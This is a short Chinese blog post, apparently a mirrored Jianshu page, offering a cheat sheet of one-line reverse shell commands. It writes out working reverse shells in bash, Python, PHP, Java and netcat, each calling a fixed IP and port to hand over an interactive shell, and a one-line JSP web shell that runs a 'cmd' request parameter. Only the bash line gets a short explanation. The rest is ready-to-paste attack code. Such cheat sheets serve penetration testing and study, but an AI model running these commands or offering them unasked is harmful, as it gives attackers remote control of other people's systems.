美文网首页
轻便的一句话反弹shell语句

轻便的一句话反弹shell语句

作者: ffx_01 | 来源:发表于2019-10-16 00:32 被阅读0次
  • bash
root# bash -i >& /dev/tcp/192.168.31.41/8080 0>&1

命令解读:
bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash 反弹环境。

  • python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • php
php -r '$sock=fsockopen("192.168.31.41",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
  • java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

执行命令的语句:

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
  • nc反弹
nc 192.168.1.123 12345 -t -e /bin/bash

相关文章

  • 轻便的一句话反弹shell语句

    bash 命令解读:bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 808...

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • nc自启动

    例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)

  • Shell 流程控制

    case语句 Shell case语句为多选择语句。 输出 while语句 输出 Shell 双括号运算符

  • SHELL 笔记

    shell笔记 判断语句 运算 选择语句 循环语句 将shell字句执行结果复制给变量 shell简单传参 编号变...

  • kail工具介绍

    反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....

  • Vulnhub靶机:DC-5

    标签:本地文件包含(LFI)、FUZZ、PHP伪协议、nginx日志文件写一句话、反弹shell、screen提权...

  • 反弹shell

    Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...

  • 反弹shell

    bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...

  • Shell反弹

    背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...

网友评论

      本文标题:轻便的一句话反弹shell语句

      本文链接:https://www.haomeiwen.com/subject/uyaemctx.html